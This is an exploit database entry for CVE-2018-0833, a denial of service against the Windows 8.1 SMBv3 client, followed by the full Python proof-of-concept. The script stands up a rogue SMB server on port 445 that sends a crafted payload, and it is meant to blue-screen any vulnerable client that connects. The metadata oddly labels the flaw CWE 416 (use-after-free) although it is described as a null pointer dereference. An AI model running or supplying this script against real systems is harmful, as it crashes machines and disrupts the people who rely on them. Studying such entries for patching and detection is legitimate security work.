Microsoft Windows SMB Client Null Pointer Dereference Denial of Service

vendor:

Windows 8.1

by:

Nabeel Ahmed

5.3

CVSS

MEDIUM

Denial of Service

416

CWE

Product Name: Windows 8.1

Affected Version From: SMBv3

Affected Version To: SMBv3

Patch Exists: YES

Related CWE: CVE-2018-0833

CPE: o:microsoft:windows_8.1

Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2018-0833/

Other Scripts: N/A

Platforms Tested: Windows 8.1 (x86), Windows Server 2012 R2 (x64)

2018

Microsoft Windows SMB Client Null Pointer Dereference Denial of Service

This exploit triggers a Blue Screen of Death (BSoD) on the target machine by sending a specially crafted payload to the SMBv3 service. The payload contains a null pointer dereference which causes the system to crash.

Mitigation:

Microsoft has released a patch for this vulnerability in the March 2018 Patch Tuesday.

Source

Exploit-DB raw data:

# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service
# Date: 26/02/2018
# Exploit Author: Nabeel Ahmed
# Version: SMBv3
# Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64)
# CVE : CVE-2018-0833

import SocketServer
from binascii import unhexlify
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141'
class byebye(SocketServer.BaseRequestHandler):
        def handle(self):
                try:
                        print "From:", self.client_address
                        print "[*]Sending Payload..."
                        self.request.send(unhexlify(payload))
                except Exception:
                        print "BSoD Triggered on", self.client_address
                        pass
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),byebye)
launch.serve_forever()